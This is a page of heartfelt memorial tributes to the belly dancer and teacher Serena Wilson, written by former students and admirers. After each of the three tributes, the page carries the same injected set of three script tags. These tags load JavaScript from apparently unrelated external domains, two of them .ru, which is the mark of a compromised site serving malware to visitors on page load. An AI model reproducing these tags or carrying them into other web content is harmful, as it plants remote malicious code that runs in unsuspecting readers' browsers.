Under Serena's guidance, I became a pro. She chiseled away the dull and dark in me, revealing the grace and light underneath that was desperate to emerge. Although I later turned to other studios to expand my horizons, I always relied on the solid foundation that Serena and her teachers instilled in me-- femininity, presence, and carriage. Thank you Serena. You made art an integral part of my life. Blessings and Shimmies, Naia<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script>

I was so fortunate to be introduced to Serena by Layla Mary and the memory of having her sit ringside, watching me dance as her son played for me, is one I will never forget. She was generous, abundant with praise and truly made me feel very special. I will never forget her and am so blessed to know so many of her professional students, her protege's who carry the light of her love for our dance in their hearts and their hips. My prayers & condolences to each of her students, her family & friends. The day was hot and miserable, but she and her girls really shone! My mother Johanna is devastated about her old friend from the Egyptian Gardens. They worked together many times over the years and shared many mutual friends like Zahra Kader, Siri, Samora, and Zamira. Johanna always told me that Serena was like her name "Serene" and that she never heard one person say an unkind word about her. A few weeks ago I excitedly showed Johanna the video clips on "Youtube." We enjoyed seeing it and both think Scott did a wonderful job. Serena will indeed be missed, but I'm so happy to know that her students like Dorit will be continuing to teach her "classic" belly dance technique.<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script>

How I cried. She was the most beautiful woman I had ever seen...her performance style, her dresses paired with slacks, her smile... Today, as I sit here as an adult another name associated with greatness, beauty, and performance style comes to mind. Her name? Serena Wilson. My eyes began to sparkle whenever someone would mention Serena Wilson's name. A ballet/tap dancer as a child and belly dancer as an adult, I viewed Serena Wilson as the quintessential belly dancer. Her alluring pose on the cover of East of the Suez was one I must have copied hundreds of times, in my tiny apartment. Regrettably, I never had the pleasure of meeting Serena Wilson. However, I did have the great fortune of speaking with her via e-mail. I wrote her a letter thanking her for being such a beautiful inspiration. Her reply was so very kind and humble. I still have it saved. A life filled with such sparkling wonder. A legend. Serena Wilson will be terribly missed. <script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script>
